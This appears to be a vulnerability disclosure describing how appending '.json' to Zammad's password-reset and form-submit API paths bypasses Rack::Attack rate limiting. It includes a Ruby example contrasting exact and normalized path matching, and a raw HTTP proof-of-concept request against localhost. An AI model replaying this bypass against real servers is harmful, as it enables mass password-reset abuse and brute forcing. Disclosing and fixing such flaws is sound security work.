Zammad relies on the rack_attack.rb file to defend the application against various brute force attacks, including forgotten-password requests, ticket submissions, etc. The rack_attack.rb configuration in use limits password reset requests to 3 per minute per IP, so 429 responses are returned after the 3rd attempt, as declared in the rack_attack.rb file. This works as intended until the tester placed a random string after the /api/v1/users/password_reset path in a captured proxy request: appending the characters ".json" to the end of /api/v1/users/password_reset (/api/v1/users/password_reset.json) allowed the tester to run hundreds of password reset requests against the server, bypassing the Rack::Attack restrictions.
The /api/v1/form_submit path was also found to be vulnerable.
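The behaviour described above is what an exact-path comparison in a throttle rule produces: the Rails format suffix (.json) makes the path a different string, so the rule never fires. The following added example is not Zammad's rack_attack.rb; it contrasts an exact-match rule with one that normalizes the suffix and trailing slash, using a small in-memory fixed-window counter as a stand-in for Rack::Attack.throttle (the route list and client IP are constructed).

```ruby
# Added example, not Zammad's own rack_attack.rb. Shows why an exact-path
# match in a throttle rule is bypassable with a format suffix such as ".json",
# and a normalized match that still throttles the aliased path.

# Routes the throttle is meant to protect (both named in the report).
THROTTLED_ROUTES = ["/api/v1/users/password_reset", "/api/v1/form_submit"].freeze

# Weak matcher: the exact comparison that lets "/path.json" slip past.
def weak_match?(path)
  THROTTLED_ROUTES.include?(path)
end

# Hardened matcher: drop trailing slashes and a Rails-style format suffix
# (".json", ".xml", ...) before comparing, so route aliases are still throttled.
def normalize_path(path)
  path.sub(%r{/+\z}, "").sub(/\.[A-Za-z0-9]+\z/, "")
end

def hardened_match?(path)
  THROTTLED_ROUTES.include?(normalize_path(path))
end

# Minimal fixed-window throttle (stand-in for Rack::Attack.throttle) so the
# bypass can be reproduced offline. allow? returns true when a request passes.
class Throttle
  def initialize(limit:, period:, matcher:)
    @limit, @period, @matcher = limit, period, matcher
    @counts = Hash.new(0)
  end

  def allow?(ip:, path:, now:)
    return true unless @matcher.call(path)   # not a throttled route
    key = [ip, now / @period]                # one counter per IP per window
    @counts[key] += 1
    @counts[key] <= @limit
  end
end

# How many of n requests from one IP get through for a given path and matcher
# (limit 3 per 60 s, all requests inside the same window). Constructed IP.
def allowed_count(matcher, path, n: 10)
  t = Throttle.new(limit: 3, period: 60, matcher: matcher)
  (1..n).count { |i| t.allow?(ip: "203.0.113.5", path: path, now: 1000 + i) }
end
```

With the weak matcher the plain path is cut off after 3 requests while the ".json" alias lets all 10 through; the hardened matcher throttles both forms identically.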
Password Reset PoC - Note .json appended to end of path
POST /api/v1/users/password_reset.json HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-CSRF-Token: tF2RQB380o7ulITTsKuhSzZKgtqqMkbILL+gIpCMi0p7g0wN+lC/oA3lnIH0FOi17kCiO5DrJ6G4fm4Q9i8FZg==
Content-Length: 33
Origin: http://localhost:8080
DNT: 1
Connection: close
Cookie: _zammad_session_a138cfd0f37=9a80633fcf555db2687c7f22b114d42f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"username":"def@mayorsec%2ecom"}